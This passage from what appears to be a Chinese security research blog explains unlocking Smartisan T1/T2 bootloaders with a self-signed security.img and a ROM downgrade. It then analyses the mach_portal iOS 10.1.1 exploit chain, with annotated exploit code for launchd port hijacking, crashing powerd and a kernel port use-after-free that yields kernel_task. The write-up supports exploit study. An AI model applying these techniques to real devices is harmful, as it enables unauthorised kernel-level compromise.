RSA_sign(4,digest, 16, sigret, &siglen, rsa);

FILE *fp =fopen(“security.img”,”wb”);

fwrite(sigret, siglen, 1, fp);

fwrite(“\x40\x00”, 2, 1, fp);

fclose(fp);

return 0;

}

刷入security.img后,手机就可以解锁了。虽然上述分析是基于T2的ROM,T1也完全适用。如图8所示,T1刷入security.img同样可以解锁。

And Then Some

2014年老罗在微博上提过关于bootloader方面的打算,“官方会提供 boot loader,方便你刷机,只是刷机后会失保”,所以初代ROM里的确如我们所见保留了解锁bootloader的功能。2016年有人因为提供解锁而状告Smartisan,老罗胜诉后说道“我在微博上说过做bootloader,但技术部门因安全考虑否决了,我代表我自己道歉。”,所以肯定是取消了该功能。尽管官方从来没有发布过任何解锁的方法,底层代码倒是可以清晰反映出这段经历。

对于T1和T2,2.6.7是最后一个可以解锁的ROM版本号,2.6.8开始,fastboot command列表被改写为图10所示内容,大部分指令被阉:

所以如果要解锁3.x的Smartisan OS,可以下载2.6.7的ROM完成降级,毕竟旧版本的ROM同样带有签名,使用recovery时允许刷入手机。更新到旧版的bootloader后,再用fastboot flash security security.img进行解锁。解锁后,每次升级用第三方无签名验证的recovery,更新除bootloader以外的模块即可。这样即便最新系统暂时没有公开的内核漏洞,也能root。

一般的Android手机,只要有签名认证的老版本bootloader里有漏洞,在系统没有开启限制(比如SW_ID)时,总可以通过降级,解锁,然后升级回新系统,刷入supersu的方式root。

mach portal漏洞利用的一些细节

前不久GP0的研究员Ian Beer公布了针对iOS 10.1.1的漏洞细节及利用代码,通过结合三个漏洞获取设备的root shell。之后意大利研究员@qwertyoruiopz在此基础上加入绕过KPP保护的漏洞利用并发布了完整的iOS10越狱

Ian Beer已经对漏洞的成因和利用做了相关描述,这里将不再阐述,而是介绍一些利用的细节以及可能的改进建议。

整个exploit chain包含了三个漏洞:

  • CVE-2016-7637 用于替换了launchd进程中往com.apple.iohideventsystem发消息的port
  • CVE-2016-7661 造成powerd崩溃重启,从而在接管com.apple.iohideventsystem后获取powerd的task port,进而获取host_priv
  • CVE-2016-7644 导致内核port的UAF,进一步获取kernel_task

替换launchd中的port

内核中的ipc_object对象对应到用户态下是一个name(int类型),每个进程的ipc_space_t中保存了name与object之间的映射关系。相关代码可以在ipc_entry.c中查看,ipc_entry_lookup函数将返回name对应的ipc_entry_t结构,其中保存了对应的object。name的高24位是table中的索引,而低8位是generation number(初始值是-1,增加步长是4,因此一共有64个值)

#define    MACH_PORT_INDEX(name)       ((name) >> 8)
#define    MACH_PORT_GEN(name)     (((name) & 0xff) << 24)
#define    MACH_PORT_MAKE(index, gen)  \
        (((index) << 8) | (gen) >> 24)

被释放的name会被标记到freelist的起始位置,当再创建的时候会有相同的索引号,但是generation number会增加4,因此当被重复释放和分配64次后会返回给用户态完全相同的name,从而可以完成劫持。

#define    IE_BITS_GEN_MASK    0xff000000  /* 8 bits for generation */
#define    IE_BITS_GEN(bits)   ((bits) & IE_BITS_GEN_MASK)
#define    IE_BITS_GEN_ONE     0x04000000  /* low bit of generation */
#define IE_BITS_NEW_GEN(old)   (((old) + IE_BITS_GEN_ONE) & IE_BITS_GEN_MASK)

简单的测试代码

    for (int i=0; i<65; i++)
    {
        mach_port_t port = 0;
        mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
        printf("port index:0x%x gen:0x%x\n", (port >> 8), (port & 0xff));
        mach_port_destroy(mach_task_self(), port);
    }

在实际利用漏洞的时候,需要在launchd的进程空间内重用name,因此可以发送一个launchd接受的id的消息,就能完成一次分配和释放(send_looper函数)。为了避免name释放后被抢占,首先调用了一次send_looper将要占用的name移动到freelist的末端相对安全的位置,进而再次调用62次来递增generation number,最后一次通过注册服务抢占name,完成了中间人劫持。

    // send one smaller looper message to push the free'd name down the free list:
    send_looper(bootstrap_port, ports, 0x100, MACH_MSG_TYPE_MAKE_SEND);

    // send the larger ones to loop the generation number whilst leaving the name in the middle of the long freelist
    for (int i = 0; i < 62; i++) {
        send_looper(bootstrap_port, ports, 0x200, MACH_MSG_TYPE_MAKE_SEND);
    }

    // now that the name should have looped round (and still be near the middle of the freelist
    // try to replace it by registering a lot of new services
    for (int i = 0; i < n_ports; i++) {
        kern_return_t err = bootstrap_register(bootstrap_port, names[i], ports[i]);
        if (err != KERN_SUCCESS) {
            printf("failed to register service %d, continuing anyway...\n", i);
        }
    }

使powerd崩溃

powerd在接收到MACH_NOTIFY_DEAD_NAME消息后没有检查发送者及port,就直接调用mach_port_deallocate去释放。利用代码中将被释放的port设置为0x103,该port应该是本进程的task port,一旦被释放后任何的内存分配处理都会直接出错。代码如下

    mach_port_t service_port = lookup("com.apple.PowerManagement.control");

    // free task_self in powerd
    for (int j = 0; j < 2; j++) {
        spoof(service_port, 0x103);
    }

    // call _io_ps_copy_powersources_info which has an unchecked vm_allocate which will fail
    // and deref an invalid pointer

    vm_address_t buffer = 0;
    vm_size_t size = 0;
    int return_code;

    io_ps_copy_powersources_info(service_port,
                                 0,
                                 &buffer,
                                 (mach_msg_type_number_t *) &size,
                                 &return_code);

在测试过程中发现有的设备的mach_task_self()返回的并不是0x103,因此可以增加循环处理的代码来加强利用的适应性。

    // free task_self in powerd
    for (int port = 0x103; port < 0x1003; port += 4) {
        for (int j = 0; j < 2; j++) {
            spoof(service_port, port);
        }
    }

内核堆跨Zone攻击

CVE-2016-7644可以通过race造成内核port对象的UAF,因此第一步需要在port对象被释放后重新去填充。由于所有的port都被分配在特殊的”ipc ports”的zone里,无法使用常见的分配kalloc zone的方式来直接填充内存。因此利用代码首先分配大量port然后释放,再调用mach_zone_force_gc将这些页面释放掉,此后可以在通过kalloc zone里spray内存来占用。

port对象的大小是0xA8(64位),其中ip_context成员(0x90偏移)可以通过用户态API读写的,Ian Beer选择了一种比较巧妙的方式来填充port对象。

首先需要了解mach msg中对MACH_MSG_OOL_PORTS_DESCRIPTOR的处理,内核收到复杂消息后发现是port descriptor后会交给ipc_kmsg_copyin_ool_ports_descriptor函数读入所有的port对象。该函数会调用kalloc分配需要的内存(64位下分配的内存是输入的2倍,name长度是4字节),然后将有效的port由name转换成真实对象地址保存,对于输入是0的name任然会填充0。

    /* calculate length of data in bytes, rounding up */
    ports_length = count * sizeof(mach_port_t);
    names_length = count * sizeof(mach_port_name_t);

    ...

    data = kalloc(ports_length);

    ...

#ifdef __LP64__
    mach_port_name_t *names = &((mach_port_name_t *)data)[count];
#else
    mach_port_name_t *names = ((mach_port_name_t *)data);
#endif

    if (copyinmap(map, addr, names, names_length) != KERN_SUCCESS) {
        ...
    }

    objects = (ipc_object_t *) data;
    dsc->address = data;

    for ( i = 0; i < count; i++) {
        mach_port_name_t name = names[i];
        ipc_object_t object;

        if (!MACH_PORT_VALID(name)) {
            objects[i] = (ipc_object_t)CAST_MACH_NAME_TO_PORT(name);
            continue;
        }

        kern_return_t kr = ipc_object_copyin(space, name, user_disp, &object);

        ...

        objects[i] = object;
    }

如果我们将输入ool port数据的恰当位置的name设置为之前获取的host_priv,那么在内核处理后,host_priv对应的内核object地址会被保存在UAF的port的ip_context成员位置,从而在用户态就可以读取到HOST_PRIV_PORT这个port的真实地址。用于填充内存的代码在send_ool_ports函数,每个descriptor会分配一个kalloc.4096(0x200*8),一个消息会在内核分配1000个4KB的页面。

  size_t n_ports = 0x200;
    mach_port_t* ports = calloc(sizeof(mach_port_t), n_ports);
    uint32_t obj_offset = 0x90;
    for (int i = 0; i < n_ports_in_zone; i++) {
        uint32_t index = (obj_offset & 0xfff) / 8;
        ports[index] = to_send;
        obj_offset += 0xa8;
    }

    // build a message with those ool ports:
    struct ool_multi_msg* leak_msg = malloc(sizeof(struct ool_multi_msg));
    memset(leak_msg, 0, sizeof(struct ool_msg));

    leak_msg->hdr.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0);
    leak_msg->hdr.msgh_size = sizeof(struct ool_msg);
    leak_msg->hdr.msgh_remote_port = q;
    leak_msg->hdr.msgh_local_port = MACH_PORT_NULL;
    leak_msg->hdr.msgh_id = 0x41414141;

    leak_msg->body.msgh_descriptor_count = 1000;

    for (int i = 0; i < 1000; i++) {
        leak_msg->ool_ports[i].address = ports;
        leak_msg->ool_ports[i].count = n_ports;
        leak_msg->ool_ports[i].deallocate = 0;
        leak_msg->ool_ports[i].disposition = MACH_MSG_TYPE_COPY_SEND;
        leak_msg->ool_ports[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
        leak_msg->ool_ports[i].copy = MACH_MSG_PHYSICAL_COPY;
    }

成功填充被释放的port后,即可以读取context的值。

    // get the target page reused by the ool port pointers
    for (int i = 0; i < n_ool_port_qs; i++) {
        ool_port_qs[i] = send_ool_ports(host_priv);
    }

    uint64_t context = 123;
    mach_port_get_context(mach_task_self(), middle_ports[0], &context);
    printf("read context value: 0x%llx\n", context);

获取kernel task port

HOST_PRIV_PORT这个port是在系统初始化函数kernel_bootstrap里的调用ipc_init创建的,而kernel task port在之后的task_init中创建,因此很大概率这两个port对象在比较接近的内存位置。

void
kernel_bootstrap(void)
{
    ...

    kernel_bootstrap_log("ipc_init");
    ipc_init();

    kernel_bootstrap_log("PMAP_ACTIVATE_KERNEL");
    PMAP_ACTIVATE_KERNEL(master_cpu);

    kernel_bootstrap_log("mapping_free_prime");
    mapping_free_prime();                       /* Load up with temporary mapping blocks */

    kernel_bootstrap_log("machine_init");
    machine_init();

    kernel_bootstrap_log("clock_init");
    clock_init();

    ledger_init();

    kernel_bootstrap_log("task_init");
    task_init();

    ...
}

上文提到kernel接收MACH_MSG_OOL_PORTS_DESCRIPTOR时候的copyin处理,同样在把消息还给用户态时有copyout的处理,会将真实的port对象地址转换成name还给用户态。可以将UAF的port的context设置成HOST_PRIV_PORT地址附近的port地址,用户态获取name后通过pid_for_task检查是否成功获取kernel task的port。receive_ool_ports函数接收之前发送填充的消息,并检查返回值找到可能的kernel task port。

    struct ool_multi_msg_rcv msg = {0};
    err = mach_msg(&msg.hdr,
                   MACH_RCV_MSG,
                   0,
                   sizeof(struct ool_multi_msg_rcv),
                   q,
                   0,
                   0);
    if (err != KERN_SUCCESS) {
        printf("failed to receive ool ports msg (%s)\n", mach_error_string(err));
        exit(EXIT_FAILURE);
    }

    mach_port_t interesting_port = MACH_PORT_NULL;
    mach_port_t kernel_task_port = MACH_PORT_NULL;

    for (int i = 0; i < 1000; i++) {
        mach_msg_ool_ports_descriptor_t* ool_desc = &msg.ool_ports[i];
        mach_port_t* ool_ports = (mach_port_t*)ool_desc->address;
        for (size_t j = 0; j < ool_desc->count; j++) {
            mach_port_t port = ool_ports[j];
            if (port == expected) {
                ;
            } else if (port != MACH_PORT_NULL) {
                interesting_port = port;
                printf("found an interesting port 0x%x\n", port);
                if (kernel_task_port == MACH_PORT_NULL &&
                    is_port_kernel_task_port(interesting_port, valid_kernel_pointer))
                {
                    kernel_task_port = interesting_port;
                }
            }
        }
        mach_vm_deallocate(mach_task_self(), (mach_vm_address_t)ool_desc->address, ((ool_desc->count*4)+0xfff)&~0xfff);
    }

利用代码中准备了0x20个UAF的port,然后从HOST_PRIV_PORT地址所在的zone的页面的中间部分开始猜测。

    for (int i = 0; i < n_middle_ports; i++) {
        // guess the middle slots in the zone block:
        mach_port_set_context(mach_task_self(), middle_ports[i], pages_base+(0xa8 * ((n_ports_in_zone/2) - (n_middle_ports/2) + i)));
    }

    mach_port_t kernel_task_port = MACH_PORT_NULL;
    for (int i = 0; i < n_ool_port_qs; i++) {
        mach_port_t new_port = receive_ool_ports(ool_port_qs[i], host_priv, pages_base);
        if (new_port != MACH_PORT_NULL) {
            kernel_task_port = new_port;
        }
    }

增加准备的UAF的port的数量(最多可增加至port的zone的页面的容量)可以提高命中率。此外上述代码的一处改进是在接收消息前再分配一些port,由于HOST_PRIV_PORT所在的zone的页面可能存在被释放了的port地址,在copyout时候会导致panic,因此填补这些空洞可以提高稳定性。

设备差异性

iOS的内核堆是由zone来管理的,具体代码可以在zalloc.c中查看。每个zone对应的页面大小计算在zinit函数中,其中ZONE_MAX_ALLOC_SIZE固定为0x8000。

    if (alloc == 0)
        alloc = PAGE_SIZE;

    alloc = round_page(alloc);
    max   = round_page(max);

    vm_size_t best_alloc = PAGE_SIZE;
    vm_size_t alloc_size;
    for (alloc_size = (2 * PAGE_SIZE); alloc_size <= ZONE_MAX_ALLOC_SIZE; alloc_size += PAGE_SIZE) {
        if (ZONE_ALLOC_FRAG_PERCENT(alloc_size, size) < ZONE_ALLOC_FRAG_PERCENT(best_alloc, size)) {
            best_alloc = alloc_size;
        }
    }
    alloc = best_alloc;

值得注意的是PAGE_SIZE在iOS下可能是0x1000或0x4000,通过观察PAGE_SHIFT_CONST的初始化可以知道当RAM大于1GB(0x40000000)的时候PAGE_SIZE=0x4000,否则PAGE_SIZE=0x1000

  if ( v139 )
  {
    v14 = 14;
    if ( *(_QWORD *)(a1 + 24) <= 0x40000000uLL )
      v15 = 12;
    else
      v15 = 14;
  }
  else
  {
    if ( (unsigned int)sub_FFFFFFF0074F2BE4("-use_hwpagesize", &v142, 4, 0) )
      v15 = 12;
    else
      v15 = 14;
    v14 = v15;
  }
  PAGE_SHIFT_CONST = v15;

iPhone 6s及之后的设备内存都是2GB,对应内核中的最小页面单位是16KB。根据zinit中的计算,ipc ports zone的页面大小是0x3000(6s之前的设备)或者0x4000(6s及之后的设备)。因此要猜测完整个页面的port需要0x49或者0x61个UAF的port。利用代码中的platform_detection也可以修改如下

void platform_detection() {
    uint32_t hwmem = 0;
    size_t hwmem_size = 4;
    sysctlbyname("hw.memsize", &hwmem, &hwmem_size, NULL, 0);
    printf("hw memory is 0x%x bytes\n", hwmem);
    if (hwmem > 0x40000000)
        n_ports_in_zone = 0x4000/0xa8;
    else
        n_ports_in_zone = 0x3000/0xa8;
}